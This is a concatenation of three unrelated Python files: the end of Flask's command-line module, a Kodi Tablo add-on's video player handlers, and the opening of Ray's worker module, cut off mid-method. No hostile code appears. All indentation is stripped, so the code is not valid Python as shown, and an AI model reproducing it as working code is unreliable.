import cryptography # noqa: F401
except ImportError:
raise click.BadParameter(
"Using ad-hoc certificates requires the cryptography library.",
ctx,
param,
) from None
return value
obj = import_string(value, silent=True)
if isinstance(obj, ssl.SSLContext):
return obj
raise
def _validate_key(ctx, param, value):
"""The ``--key`` option must be specified when ``--cert`` is a file.
Modifies the ``cert`` param to be a ``(cert, key)`` pair if needed.
"""
cert = ctx.params.get("cert")
is_adhoc = cert == "adhoc"
is_context = ssl and isinstance(cert, ssl.SSLContext)
if value is not None:
if is_adhoc:
raise click.BadParameter(
'When "--cert" is "adhoc", "--key" is not used.', ctx, param
)
if is_context:
raise click.BadParameter(
'When "--cert" is an SSLContext object, "--key is not used.', ctx, param
)
if not cert:
raise click.BadParameter('"--cert" must also be specified.', ctx, param)
ctx.params["cert"] = cert, value
else:
if cert and not (is_adhoc or is_context):
raise click.BadParameter('Required when using "--cert".', ctx, param)
return value
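# Example invocations accepted by the --cert/--key pair validated above
# (file names are hypothetical):
#
#     flask run --cert cert.pem --key key.pem   # file cert: --key is required
#     flask run --cert adhoc                    # ad-hoc cert: --key must be omitted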
class SeparatedPathType(click.Path):
"""Click option type that accepts a list of values separated by the
OS's path separator (``:``, ``;`` on Windows). Each value is
validated as a :class:`click.Path` type.
"""
def convert(self, value, param, ctx):
items = self.split_envvar_value(value)
super_convert = super().convert
return [super_convert(item, param, ctx) for item in items]
@click.command("run", short_help="Run a development server.")
@click.option("--host", "-h", default="127.0.0.1", help="The interface to bind to.")
@click.option("--port", "-p", default=5000, help="The port to bind to.")
@click.option(
"--cert", type=CertParamType(), help="Specify a certificate file to use HTTPS."
)
@click.option(
"--key",
type=click.Path(exists=True, dir_okay=False, resolve_path=True),
callback=_validate_key,
expose_value=False,
help="The key file to use when specifying a certificate.",
)
@click.option(
"--reload/--no-reload",
default=None,
help="Enable or disable the reloader. By default the reloader "
"is active if debug is enabled.",
)
@click.option(
"--debugger/--no-debugger",
default=None,
help="Enable or disable the debugger. By default the debugger "
"is active if debug is enabled.",
)
@click.option(
"--eager-loading/--lazy-loading",
default=None,
help="Enable or disable eager loading. By default eager "
"loading is enabled if the reloader is disabled.",
)
@click.option(
"--with-threads/--without-threads",
default=True,
help="Enable or disable multithreading.",
)
@click.option(
"--extra-files",
default=None,
type=SeparatedPathType(),
help=(
"Extra files that trigger a reload on change. Multiple paths"
f" are separated by {os.path.pathsep!r}."
),
)
@pass_script_info
def run_command(
info, host, port, reload, debugger, eager_loading, with_threads, cert, extra_files
):
"""Run a local development server.
This server is for development purposes only. It does not provide
the stability, security, or performance of production WSGI servers.
The reloader and debugger are enabled by default if
FLASK_ENV=development or FLASK_DEBUG=1.
"""
debug = get_debug_flag()
if reload is None:
reload = debug
if debugger is None:
debugger = debug
show_server_banner(get_env(), debug, info.app_import_path, eager_loading)
app = DispatchingApp(info.load_app, use_eager_loading=eager_loading)
from werkzeug.serving import run_simple
run_simple(
host,
port,
app,
use_reloader=reload,
use_debugger=debugger,
threaded=with_threads,
ssl_context=cert,
extra_files=extra_files,
)
@click.command("shell", short_help="Run a shell in the app context.")
@with_appcontext
def shell_command() -> None:
"""Run an interactive Python shell in the context of a given
Flask application. The application will populate the default
namespace of this shell according to its configuration.
This is useful for executing small snippets of management code
without having to manually configure the application.
"""
import code
from .globals import _app_ctx_stack
app = _app_ctx_stack.top.app
banner = (
f"Python {sys.version} on {sys.platform}\n"
f"App: {app.import_name} [{app.env}]\n"
f"Instance: {app.instance_path}"
)
ctx: dict = {}
# Support the regular Python interpreter startup script if someone
# is using it.
startup = os.environ.get("PYTHONSTARTUP")
if startup and os.path.isfile(startup):
with open(startup) as f:
eval(compile(f.read(), startup, "exec"), ctx)
ctx.update(app.make_shell_context())
# Site, customize, or startup script can set a hook to call when
# entering interactive mode. The default one sets up readline with
# tab and history completion.
interactive_hook = getattr(sys, "__interactivehook__", None)
if interactive_hook is not None:
try:
import readline
from rlcompleter import Completer
except ImportError:
pass
else:
# rlcompleter uses __main__.__dict__ by default, which is
# flask.__main__. Use the shell context instead.
readline.set_completer(Completer(ctx).complete)
interactive_hook()
code.interact(banner=banner, local=ctx)
@click.command("routes", short_help="Show the routes for the app.")
@click.option(
"--sort",
"-s",
type=click.Choice(("endpoint", "methods", "rule", "match")),
default="endpoint",
help=(
'Method to sort routes by. "match" is the order that Flask will match '
"routes when dispatching a request."
),
)
@click.option("--all-methods", is_flag=True, help="Show HEAD and OPTIONS methods.")
@with_appcontext
def routes_command(sort: str, all_methods: bool) -> None:
"""Show all registered routes with endpoints and methods."""
rules = list(current_app.url_map.iter_rules())
if not rules:
click.echo("No routes were registered.")
return
ignored_methods = set(() if all_methods else ("HEAD", "OPTIONS"))
if sort in ("endpoint", "rule"):
rules = sorted(rules, key=attrgetter(sort))
elif sort == "methods":
rules = sorted(rules, key=lambda rule: sorted(rule.methods)) # type: ignore
rule_methods = [
", ".join(sorted(rule.methods - ignored_methods)) # type: ignore
for rule in rules
]
headers = ("Endpoint", "Methods", "Rule")
widths = (
max(len(rule.endpoint) for rule in rules),
max(len(methods) for methods in rule_methods),
max(len(rule.rule) for rule in rules),
)
widths = [max(len(h), w) for h, w in zip(headers, widths)]
row = "{{0:<{0}}} {{1:<{1}}} {{2:<{2}}}".format(*widths)
click.echo(row.format(*headers).strip())
click.echo(row.format(*("-" * width for width in widths)))
for rule, methods in zip(rules, rule_methods):
click.echo(row.format(rule.endpoint, methods, rule.rule).rstrip())
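# Illustration of the row template construction above (widths are
# hypothetical examples):
#
#     "{{0:<{0}}} {{1:<{1}}} {{2:<{2}}}".format(8, 7, 5)
#     # -> "{0:<8} {1:<7} {2:<5}" : left-align each column to its width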
cli = FlaskGroup(
help="""\
A general utility script for Flask applications.
Provides commands from Flask, extensions, and the application. Loads the
application defined in the FLASK_APP environment variable, or from a wsgi.py
file. Setting the FLASK_ENV environment variable to 'development' will enable
debug mode.
\b
{prefix}{cmd} FLASK_APP=hello.py
{prefix}{cmd} FLASK_ENV=development
{prefix}flask run
""".format(
cmd="export" if os.name == "posix" else "set",
prefix="$ " if os.name == "posix" else "> ",
)
)
def main() -> None:
if int(click.__version__[0]) < 8:
warnings.warn(
"Using the `flask` cli with Click 7 is deprecated and"
" will not be supported starting with Flask 2.1."
" Please upgrade to Click 8 as soon as possible.",
DeprecationWarning,
)
# TODO omit sys.argv once https://github.com/pallets/click/issues/536 is fixed
cli.main(args=sys.argv[1:])
if __name__ == "__main__":
main()
|
player.py
|
import xbmc
import xbmcgui
import threading
import copy
import os
import urllib
from lib import util
from lib.tablo import bif
from lib.windows import kodigui
from lib.util import T
class TrickModeWindow(kodigui.BaseWindow):
name = 'TRICKMODE'
xmlFile = 'script-tablo-trick-mode.xml'
path = util.ADDON.getAddonInfo('path')
theme = 'Main'
IMAGE_LIST_ID = 100
PROGRESS_IMAGE_ID = 200
PROGRESS_SELECT_IMAGE_ID = 201
PROGRESS_WIDTH = 880
PROGRESS_SELECT_IMAGE_X = 199
PROGRESS_SELECT_IMAGE_Y = -50
def __init__(self, *args, **kwargs):
kodigui.BaseWindow.__init__(self, *args, **kwargs)
self.url = kwargs.get('url')
self.callback = kwargs.get('callback')
self.playlist = kwargs.get('playlist')
self.select = None
self.maxTimestamp = 0
self._duration = 0
self.trickPath = os.path.join(util.PROFILE, 'trick')
if not os.path.exists(self.trickPath):
os.makedirs(self.trickPath)
self.getBif()
def onFirstInit(self):
self.imageList = kodigui.ManagedControlList(self, self.IMAGE_LIST_ID, 4)
self.progressImage = self.getControl(self.PROGRESS_IMAGE_ID)
self.progressSelectImage = self.getControl(self.PROGRESS_SELECT_IMAGE_ID)
self.fillImageList()
self.setProperty('end', util.durationToShortText(self.duration))
def onAction(self, action):
try:
self.updateProgressSelection()
if action in (xbmcgui.ACTION_STOP, xbmcgui.ACTION_NAV_BACK, xbmcgui.ACTION_PREVIOUS_MENU):
self.callback(False)
self.doClose()
except:
util.ERROR()
kodigui.BaseWindow.onAction(self, action)
def onClick(self, controlID):
if controlID != self.IMAGE_LIST_ID:
return
item = self.imageList.getSelectedItem()
if not item:
return
if self.bif:
timestamp = item.dataSource['timestamp']
else:
timestamp = float(item.getProperty('timestamp'))
self.setProgress(timestamp)
self.callback(timestamp)
def onFocus(self, controlID):
if self.select is not None:
self.imageList.selectItem(self.select)
self.select = None
@property
def duration(self):
return self._duration or self.maxTimestamp
def blank(self):
self.setProperty('show', '')
def unBlank(self):
self.setProperty('show', '1')
def setPosition(self, position):
position = min(position, self.maxTimestamp)
self.setProperty('current', util.durationToShortText(position))
util.DEBUG_LOG('TrickMode: Setting position at {0} of {1}'.format(position, self.duration))
if not self.maxTimestamp:
return
self.setProgress(position)
self.setProgressSelect(position)
if self.bif:
i = -1
for i, frame in enumerate(self.bif.frames):
if position > frame['timestamp']:
continue
break
i -= 1
if i >= 0:
self.select = i
else:
timestamp = 0
for i, segment in enumerate(self.playlist.segments):
timestamp += segment.duration
if timestamp > position:
self.select = i
break
else:
self.select = 0
def setProgress(self, position):
if not self.started:
return
w = int((position / float(self.duration)) * self.PROGRESS_WIDTH) or 1
self.progressImage.setWidth(w)
def setProgressSelect(self, position):
if not self.started:
return
x = self.PROGRESS_SELECT_IMAGE_X + int((position / float(self.maxTimestamp)) * self.PROGRESS_WIDTH)
self.progressSelectImage.setPosition(x, self.PROGRESS_SELECT_IMAGE_Y)
self.setProperty('select', util.durationToShortText(position))
def updateProgressSelection(self):
item = self.imageList.getSelectedItem()
if not item:
return
self.setProgressSelect(float(item.getProperty('timestamp')))
def cleanTrickPath(self):
for f in os.listdir(self.trickPath):
os.remove(os.path.join(self.trickPath, f))
def getBif(self):
self.bif = None
if not self.url:
return
self.cleanTrickPath()
bifPath = os.path.join(self.trickPath, 'bif')
urllib.urlretrieve(self.url, bifPath)
self.bif = bif.Bif(bifPath)
self.bif.dumpImages(self.trickPath)
self.maxTimestamp = self.bif.maxTimestamp
util.DEBUG_LOG('TrickMode: Bif frames ({0}) - max timestamp ({1})'.format(self.bif.size, self.bif.maxTimestamp))
def fillImageList(self):
items = []
if self.bif:
for i in range(self.bif.size):
timestamp = self.bif.frames[i]['timestamp']
item = kodigui.ManagedListItem(
str(timestamp),
thumbnailImage=os.path.join(self.trickPath, str(i) + '.jpg'),
data_source=self.bif.frames[i]
)
item.setProperty('timestamp', str(timestamp))
items.append(item)
else:
timestamp = 0
for segment in self.playlist.segments:
item = kodigui.ManagedListItem(
str(timestamp),
thumbnailImage='',
data_source=segment
)
item.setProperty('timestamp', str(timestamp))
self.maxTimestamp = timestamp
timestamp += segment.duration
items.append(item)
self._duration = self.maxTimestamp
self.imageList.addItems(items)
class ThreadedWatch(object):
def __init__(self, airing, dialog):
self.dialog = dialog
self.airing = airing
self.watch = None
self.thread = None
def __enter__(self):
return self.start()
def __exit__(self, exc_type, exc_value, traceback):
pass
def start(self):
self.thread = threading.Thread(target=self.watchThread)
self.thread.start()
return self
def watchThread(self):
util.DEBUG_LOG('ThreadedWatch: Started')
self.watch = self.airing.watch()
util.DEBUG_LOG('ThreadedWatch: Finished')
def getWatch(self):
util.DEBUG_LOG('ThreadedWatch: getWatch - Started')
while self.thread.isAlive() and not self.dialog.canceled:
self.thread.join(0.1)
util.DEBUG_LOG('ThreadedWatch: getWatch - Finished')
return self.watch
class PlayerHandler(object):
def __init__(self, player):
self.player = player
self._thread = threading.Thread()
self.init()
def init(self):
pass
def play(self):
raise NotImplementedError
def startWait(self):
if not self._thread.isAlive():
self._thread = threading.Thread(target=self.wait)
self._thread.start()
def onPlayBackStarted(self):
pass
def onPlayBackStopped(self):
pass
def onPlayBackEnded(self):
pass
def onPlayBackSeek(self, time, offset):
pass
def onPlayBackFailed(self):
pass
def onVideoWindowClosed(self):
pass
def onVideoWindowOpened(self):
pass
def waitForStop(self):
self._waiting.wait()
class RecordingHandler(PlayerHandler):
def init(self):
self.playlistFilename = os.path.join(util.PROFILE, 'pl.m3u8')
self.reset()
def reset(self):
self.airing = None
self.watch = None
self.trickWindow = None
self.item = None
self.finished = False
self.startPosition = 0
self.softReset()
def softReset(self):
self._waiting = threading.Event()
self._waiting.set()
self.position = 0
self.seeking = False
self.playlist = None
self.segments = None
@property
def absolutePosition(self):
return self.startPosition + self.position
def makeSeekedPlaylist(self, position):
m = self.playlist
m.segments = copy.copy(self.segments)
if position > 0:
duration = m.segments[0].duration
while duration < position:
del m.segments[0]
if not m.segments:
break
duration += m.segments[0].duration
m.dump(self.playlistFilename)
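# Illustration (segment durations are hypothetical): with 6-second segments
# and position=10, the loop drops the first segment (6 < 10) and stops once
# the running duration reaches 12, so the dumped playlist resumes at the
# segment boundary nearest the requested position.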
def setupTrickMode(self, watch):
self.trickWindow = TrickModeWindow.create(url=watch.bifHD, callback=self.trickWindowCallback, playlist=self.watch.getSegmentedPlaylist())
def play(self, rec, show=None, resume=True):
self.reset()
self.airing = rec
watch = rec.watch()
if watch.error:
return watch.error
self.watch = watch
title = rec.title or (show and show.title or '{0} {1}'.format(rec.displayChannel(), rec.network))
thumb = show and show.thumb or ''
self.item = xbmcgui.ListItem(title, title, thumbnailImage=thumb, path=watch.url)
self.item.setInfo('video', {'title': title, 'tvshowtitle': title})
self.item.setIconImage(thumb)
self.playlist = watch.getSegmentedPlaylist()
self.segments = copy.copy(self.playlist.segments)
self.setupTrickMode(watch)
if rec.position and resume:
util.DEBUG_LOG('Player (Recording): Resuming at {0}'.format(rec.position))
self.playAtPosition(rec.position)
else:
util.DEBUG_LOG('Player (Recording): Playing from beginning')
self.playAtPosition(0)
# self.player.play(watch.url, self.item, False, 0)
return None
def trickWindowCallback(self, position):
if position is False:
return self.finish(force=True)
self.playAtPosition(position)
def playAtPosition(self, position):
self.startPosition = position
self.position = 0
self.makeSeekedPlaylist(position)
self.trickWindow.setPosition(self.absolutePosition)
self.player.play(self.playlistFilename, self.item, False, 0)
def wait(self):
self._waiting.clear()
try:
cacheCount = 0
while (self.player.isPlayingVideo() or self.seeking) and not xbmc.abortRequested:
if xbmc.getCondVisibility('Player.Seeking'):
self.onPlayBackSeek(self.position, 0)
elif self.player.isPlayingVideo():
self.position = self.player.getTime()
xbmc.sleep(100)
if xbmc.getCondVisibility('Player.Caching') and self.position - self.startPosition < 10:
cacheCount += 1
if cacheCount > 4 and not xbmc.getCondVisibility('IntegerGreaterThan(Player.CacheLevel,0)'):
util.DEBUG_LOG(
'Player (Recording): Forcing resume at {0} - cache level: {1}'.format(self.position, xbmc.getInfoLabel('Player.CacheLevel'))
)
xbmc.executebuiltin('PlayerControl(play)')
cacheCount = 0
else:
cacheCount = 0
if self.position:
util.DEBUG_LOG('Player (Recording): Saving position [{0}]'.format(self.absolutePosition))
self.airing.setPosition(self.absolutePosition)
finally:
self._waiting.set()
self.finish()
def onPlayBackStarted(self):
try:
self.trickWindow.setPosition(self.absolutePosition)
self.trickWindow.blank()
except:
util.ERROR()
self.startWait()
def onPlayBackSeek(self, time, offset):
if self.seeking:
return
self.seeking = True
self.trickWindow.setPosition(self.absolutePosition)
self.trickWindow.unBlank()
if self.player.isPlayingVideo():
util.DEBUG_LOG('Player (Recording): Stopping video for seek')
self.player.stop()
util.DEBUG_LOG('Player (Recording): Seek started at {0} (absolute: {1})'.format(self.position, self.absolutePosition))
def onPlayBackFailed(self):  # matches PlayerHandler.onPlayBackFailed so the player can dispatch to it
self.finish(force=True)
def onVideoWindowOpened(self):
self.seeking = False
def onVideoWindowClosed(self):
if not self.seeking:
if self.player.isPlayingVideo():
util.DEBUG_LOG('Player (Recording): Stopping video on video window closed')
self.player.stop()
def closeTrickWindow(self):
try:
if not self.trickWindow:
return
util.DEBUG_LOG('Player (Recording): Closing trick window')
self.trickWindow.doClose()
del self.trickWindow
except AttributeError:
pass
self.trickWindow = None
def finish(self, force=False):
if self.finished:
return
self.finished = True
self.seeking = False
util.DEBUG_LOG('Player (Recording): Played for {0} seconds'.format(self.position))
self.closeTrickWindow()
class LiveRecordingHandler(RecordingHandler):
def reset(self):
self.loadingDialog = None
self.seekableEnded = False
RecordingHandler.reset(self)
def softReset(self):
self.nextPlay = None
RecordingHandler.softReset(self)
def checkForNext(self):
util.DEBUG_LOG('Player (Recording): Checking for remaining live portion')
if not self.seekableEnded or not self.nextPlay:
self.finish()
return
util.DEBUG_LOG('Player (Recording): Playing live portion')
url = self.nextPlay
self.softReset()
self.loadingDialog = util.LoadingDialog().show()
self.closeTrickWindow()
self.startPosition = self.absolutePosition
self.position = 0
self.player.play(url, self.item, False, 0)
def playAtPosition(self, position):
self.startPosition = position
self.position = 0
self.makeSeekedPlaylist(position)
self.trickWindow.setPosition(self.absolutePosition)
with open(self.playlistFilename, 'a') as f:
f.write('\n#EXT-X-ENDLIST')
self.nextPlay = self.watch.url
self.player.play(self.playlistFilename, self.item, False, 0)
def saveLivePosition(self):
if self.position:
util.DEBUG_LOG('Player (Recording): Live - saving position [{0}]'.format(self.absolutePosition))
self.airing.setPosition(self.absolutePosition)
def wait(self):
RecordingHandler.wait(self)
self.checkForNext()
def waitLive(self):
if not self._thread.isAlive():
self._thread = threading.Thread(target=self._waitLive)
self._thread.start()
def _waitLive(self):
self._waiting.clear()
try:
while self.player.isPlayingVideo() and not xbmc.abortRequested:
self.position = self.player.getTime()
xbmc.sleep(100)
finally:
self._waiting.set()
self.saveLivePosition()
def onPlayBackStarted(self):
if not self.nextPlay:
self.waitLive()
return
RecordingHandler.onPlayBackStarted(self)
def onPlayBackEnded(self):
if self.nextPlay:
self.seeking = False
self.seekableEnded = True
def onPlayBackSeek(self, time, offset):
if not self.nextPlay:
return
RecordingHandler.onPlayBackSeek(self, time, offset)
def onVideoWindowOpened(self):
self.seeking = False
if not self.nextPlay:
self.closeLoadingDialog()
def onVideoWindowClosed(self):
if not self.nextPlay:
self.closeTrickWindow()
return
RecordingHandler.onVideoWindowClosed(self)
def finish(self, force=False):
if not force:
if self.seekableEnded:
return
RecordingHandler.finish(self)
def closeLoadingDialog(self):
if self.loadingDialog:
self.loadingDialog.close()
self.loadingDialog = None
class LiveTVHandler(PlayerHandler):
def init(self):
self.loadingDialog = None
self.reset()
def reset(self):
self.airing = None
self.closeLoadingDialog()
self.softReset()
def softReset(self):
self._waiting = threading.Event()
self._waiting.set()
def play(self, airing):
self.reset()
self.airing = airing
self.loadingDialog = util.LoadingDialog().show()
threading.Thread(target=self._playAiringChannel).start()
def _playAiringChannel(self):
airing = self.airing
with ThreadedWatch(airing, self.loadingDialog) as tw:
watch = tw.getWatch()
if watch:
if watch.error:
util.DEBUG_LOG('Player (LiveTV): Watch error: {0}'.format(watch.error))
xbmcgui.Dialog().ok(T(32196), T(32197), ' ', str(watch.errorDisplay))
self.closeLoadingDialog()
return watch.error
util.DEBUG_LOG('Player (LiveTV): Watch URL: {0}'.format(watch.url))
else:
util.DEBUG_LOG('Player (LiveTV): Canceled before start')
self.closeLoadingDialog()
return
self.watch = watch
title = '{0} {1}'.format(airing.displayChannel(), airing.network)
thumb = airing.thumb
li = xbmcgui.ListItem(title, title, thumbnailImage=thumb, path=watch.url)
li.setInfo('video', {'title': title, 'tvshowtitle': title})
li.setIconImage(thumb)
util.DEBUG_LOG('Player (LiveTV): Playing channel')
self.player.play(watch.url, li, False, 0)
self.loadingDialog.wait()
return None
def wait(self):
self._waiting.clear()
try:
while self.player.isPlayingVideo() and not xbmc.abortRequested:
xbmc.sleep(100)
finally:
self._waiting.set()
def onPlayBackStarted(self):
self.startWait()
def onVideoWindowOpened(self):
self.closeLoadingDialog()
def onVideoWindowClosed(self):
if self.player.isPlayingVideo():
util.DEBUG_LOG('Player (LiveTV): Stopping video')
self.player.stop()
def closeLoadingDialog(self):
if self.loadingDialog:
self.loadingDialog.close()
self.loadingDialog = None
class TabloPlayer(xbmc.Player):
def init(self):
self.reset()
self.monitor()
return self
def reset(self):
self.started = False
self.handler = None
def playAiringChannel(self, airing):
self.reset()
self.handler = LiveTVHandler(self)
return self.handler.play(airing)
def playRecording(self, rec, show=None, resume=True):
self.reset()
self.handler = RecordingHandler(self)
return self.handler.play(rec, show, resume)
def playLiveRecording(self, rec, show=None, resume=True):
self.reset()
self.handler = LiveRecordingHandler(self)
return self.handler.play(rec, show, resume)
def onPlayBackStarted(self):
self.started = True
util.DEBUG_LOG('Player - STARTED')
if not self.handler:
return
self.handler.onPlayBackStarted()
def onPlayBackStopped(self):
if not self.started:
self.onPlaybackFailed()
util.DEBUG_LOG('Player - STOPPED' + (not self.started and ': FAILED' or ''))
if not self.handler:
return
self.handler.onPlayBackStopped()
def onPlayBackEnded(self):
if not self.started:
self.onPlaybackFailed()
util.DEBUG_LOG('Player - ENDED' + (not self.started and ': FAILED' or ''))
if not self.handler:
return
self.handler.onPlayBackEnded()
def onPlayBackSeek(self, time, offset):
util.DEBUG_LOG('Player - SEEK')
if not self.handler:
return
self.handler.onPlayBackSeek(time, offset)
def onPlaybackFailed(self):
if not self.handler:
return
self.handler.onPlayBackFailed()
def onVideoWindowOpened(self):
util.DEBUG_LOG('Player: Video window opened')
try:
self.handler.onVideoWindowOpened()
except:
util.ERROR()
def onVideoWindowClosed(self):
util.DEBUG_LOG('Player: Video window closed')
try:
self.handler.onVideoWindowClosed()
self.stop()
except:
util.ERROR()
def stopAndWait(self):
if self.isPlayingVideo():
util.DEBUG_LOG('Player (Recording): Stopping for external wait')
self.stop()
self.handler.waitForStop()
def monitor(self):
threading.Thread(target=self._monitor).start()
def _monitor(self):
while not xbmc.abortRequested:
# Monitor loop
if self.isPlayingVideo():
util.DEBUG_LOG('Player: Monitoring')
hasFullScreened = False
while self.isPlayingVideo() and not xbmc.abortRequested:
xbmc.sleep(100)
if xbmc.getCondVisibility('VideoPlayer.IsFullscreen'):
if not hasFullScreened:
hasFullScreened = True
self.onVideoWindowOpened()
elif hasFullScreened and not xbmc.getCondVisibility('Window.IsVisible(busydialog)'):
hasFullScreened = False
self.onVideoWindowClosed()
if hasFullScreened:
self.onVideoWindowClosed()
# Idle loop
if not self.isPlayingVideo():
util.DEBUG_LOG('Player: Idling...')
while not self.isPlayingVideo() and not xbmc.abortRequested:
xbmc.sleep(100)
PLAYER = TabloPlayer().init()
|
worker.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import atexit
import collections
import colorama
import hashlib
import inspect
import numpy as np
import os
import redis
import signal
import sys
import threading
import time
import traceback
# Ray modules
import pyarrow
import pyarrow.plasma as plasma
import ray.cloudpickle as pickle
import ray.experimental.state as state
import ray.gcs_utils
import ray.remote_function
import ray.serialization as serialization
import ray.services as services
from ray.services import logger
import ray.signature
import ray.local_scheduler
import ray.plasma
import ray.ray_constants as ray_constants
from ray import import_thread
from ray import profiling
from ray.utils import (
binary_to_hex,
check_oversized_pickle,
is_cython,
random_string,
)
SCRIPT_MODE = 0
WORKER_MODE = 1
LOCAL_MODE = 2
SILENT_MODE = 3
ERROR_KEY_PREFIX = b"Error:"
DRIVER_ID_LENGTH = 20
ERROR_ID_LENGTH = 20
# This must match the definition of NIL_ACTOR_ID in task.h.
NIL_ID = 20 * b"\xff"
NIL_LOCAL_SCHEDULER_ID = NIL_ID
NIL_FUNCTION_ID = NIL_ID
NIL_ACTOR_ID = NIL_ID
NIL_ACTOR_HANDLE_ID = NIL_ID
NIL_CLIENT_ID = 20 * b"\xff"
# This must be kept in sync with the `error_types` array in
# common/state/error_table.h.
OBJECT_HASH_MISMATCH_ERROR_TYPE = b"object_hash_mismatch"
PUT_RECONSTRUCTION_ERROR_TYPE = b"put_reconstruction"
# This must be kept in sync with the `scheduling_state` enum in common/task.h.
TASK_STATUS_RUNNING = 8
# Default resource requirements for actors when no resource requirements are
# specified.
DEFAULT_ACTOR_METHOD_CPUS_SIMPLE_CASE = 1
DEFAULT_ACTOR_CREATION_CPUS_SIMPLE_CASE = 0
# Default resource requirements for actors when some resource requirements are
# specified.
DEFAULT_ACTOR_METHOD_CPUS_SPECIFIED_CASE = 0
DEFAULT_ACTOR_CREATION_CPUS_SPECIFIED_CASE = 1
class RayTaskError(Exception):
"""An object used internally to represent a task that threw an exception.
If a task throws an exception during execution, a RayTaskError is stored in
the object store for each of the task's outputs. When an object is
retrieved from the object store, the Python method that retrieved it checks
to see whether the object is a RayTaskError; if it is, an exception is
thrown that propagates the error message.
Currently, we either use the exception attribute or the traceback attribute
but not both.
Attributes:
function_name (str): The name of the function that failed and produced
the RayTaskError.
exception (Exception): The exception object thrown by the failed task.
traceback_str (str): The traceback from the exception.
"""
def __init__(self, function_name, exception, traceback_str):
"""Initialize a RayTaskError."""
self.function_name = function_name
if (isinstance(exception, RayGetError)
or isinstance(exception, RayGetArgumentError)):
self.exception = exception
else:
self.exception = None
self.traceback_str = traceback_str
def __str__(self):
"""Format a RayTaskError as a string."""
if self.traceback_str is None:
# This path is taken if getting the task arguments failed.
return ("Remote function {}{}{} failed with:\n\n{}".format(
colorama.Fore.RED, self.function_name, colorama.Fore.RESET,
self.exception))
else:
# This path is taken if the task execution failed.
return ("Remote function {}{}{} failed with:\n\n{}".format(
colorama.Fore.RED, self.function_name, colorama.Fore.RESET,
self.traceback_str))
class RayGetError(Exception):
"""An exception used when get is called on an output of a failed task.
Attributes:
objectid (lib.ObjectID): The ObjectID that get was called on.
task_error (RayTaskError): The RayTaskError object created by the
failed task.
"""
def __init__(self, objectid, task_error):
"""Initialize a RayGetError object."""
self.objectid = objectid
self.task_error = task_error
def __str__(self):
"""Format a RayGetError as a string."""
return ("Could not get objectid {}. It was created by remote function "
"{}{}{} which failed with:\n\n{}".format(
self.objectid, colorama.Fore.RED,
self.task_error.function_name, colorama.Fore.RESET,
self.task_error))
class RayGetArgumentError(Exception):
"""An exception used when a task's argument was produced by a failed task.
Attributes:
argument_index (int): The index (zero indexed) of the failed argument
in present task's remote function call.
function_name (str): The name of the function for the current task.
objectid (lib.ObjectID): The ObjectID that was passed in as the
argument.
task_error (RayTaskError): The RayTaskError object created by the
failed task.
"""
def __init__(self, function_name, argument_index, objectid, task_error):
"""Initialize a RayGetArgumentError object."""
self.argument_index = argument_index
self.function_name = function_name
self.objectid = objectid
self.task_error = task_error
def __str__(self):
"""Format a RayGetArgumentError as a string."""
return ("Failed to get objectid {} as argument {} for remote function "
"{}{}{}. It was created by remote function {}{}{} which "
"failed with:\n{}".format(
self.objectid, self.argument_index, colorama.Fore.RED,
self.function_name, colorama.Fore.RESET, colorama.Fore.RED,
self.task_error.function_name, colorama.Fore.RESET,
self.task_error))
FunctionExecutionInfo = collections.namedtuple(
"FunctionExecutionInfo", ["function", "function_name", "max_calls"])
"""FunctionExecutionInfo: A named tuple storing remote function information."""
class Worker(object):
"""A class used to define the control flow of a worker process.
Note:
The methods in this class are considered unexposed to the user. The
functions outside of this class are considered exposed.
Attributes:
function_execution_info (Dict[str, FunctionExecutionInfo]): A
dictionary mapping the name of a remote function to the remote
function itself. This is the set of remote functions that can be
executed by this worker.
connected (bool): True if Ray has been started and False otherwise.
mode: The mode of the worker. One of SCRIPT_MODE, LOCAL_MODE,
SILENT_MODE, and WORKER_MODE.
cached_remote_functions_and_actors: A list of information for exporting
remote functions and actor class definitions that were defined
before the worker called connect. When the worker eventually does
call connect, if it is a driver, it will export these functions and
actors. If cached_remote_functions_and_actors is None, that means
that connect has been called already.
cached_functions_to_run (List): A list of functions to run on all of
the workers that should be exported as soon as connect is called.
profiler: the profiler used to aggregate profiling information.
"""
def __init__(self):
"""Initialize a Worker object."""
# This field is a dictionary that maps a driver ID to a dictionary of
# functions (and information about those functions) that have been
# registered for that driver (this inner dictionary maps function IDs
# to a FunctionExecutionInfo object). This should only be used on
# workers that execute remote functions.
self.function_execution_info = collections.defaultdict(lambda: {})
# This is a dictionary mapping driver ID to a dictionary that maps
# remote function IDs for that driver to a counter of the number of
# times that remote function has been executed on this worker. The
# counter is incremented every time the function is executed on this
# worker. When the counter reaches the maximum number of executions
# allowed for a particular function, the worker is killed.
self.num_task_executions = collections.defaultdict(lambda: {})
self.connected = False
self.mode = None
self.cached_remote_functions_and_actors = []
self.cached_functions_to_run = []
self.fetch_and_register_actor = None
self.make_actor = None
self.actors = {}
self.actor_task_counter = 0
# A set of all of the actor class keys that have been imported by the
# import thread. It is safe to convert this worker into an actor of
# these types.
self.imported_actor_classes = set()
# The number of threads Plasma should use when putting an object in the
# object store.
self.memcopy_threads = 12
# When the worker is constructed, record the original value of the
# CUDA_VISIBLE_DEVICES environment variable.
self.original_gpu_ids = ray.utils.get_cuda_visible_devices()
self.profiler = profiling.Profiler(self)
def check_connected(self):
"""Check if the worker is connected.
Raises:
Exception: An exception is raised if the worker is not connected.
"""
if not self.connected:
raise RayConnectionError("Ray has not been started yet. You can "
"start Ray with 'ray.init()'.")
def set_mode(self, mode):
"""Set the mode of the worker.
The mode SCRIPT_MODE should be used if this Worker is a driver that is
being run as a Python script or interactively in a shell. It will print
information about task failures.
The mode WORKER_MODE should be used if this Worker is not a driver. It
will not print information about tasks.
The mode LOCAL_MODE should be used if this Worker is a driver and if
you want to run the driver in a manner equivalent to serial Python for
debugging purposes. It will not send remote function calls to the
scheduler and will instead execute them in a blocking fashion.
The mode SILENT_MODE should be used only during testing. It does not
print any information about errors because some of the tests
intentionally fail.
Args:
mode: One of SCRIPT_MODE, WORKER_MODE, LOCAL_MODE, and
SILENT_MODE.
"""
self.mode = mode
def store_and_register(self, object_id, value, depth=100):
"""Store an object and attempt to register its class if needed.
Args:
object_id: The ID of the object to store.
value: The value to put in the object store.
depth: The maximum number of classes to recursively register.
Raises:
Exception: An exception is raised if the attempt to store the
object fails. This can happen if there is already an object
with the same ID in the object store or if the object store is
full.
"""
counter = 0
while True:
if counter == depth:
raise Exception("Ray exceeded the maximum number of classes "
"that it will recursively serialize when "
"attempting to serialize an object of "
"type {}.".format(type(value)))
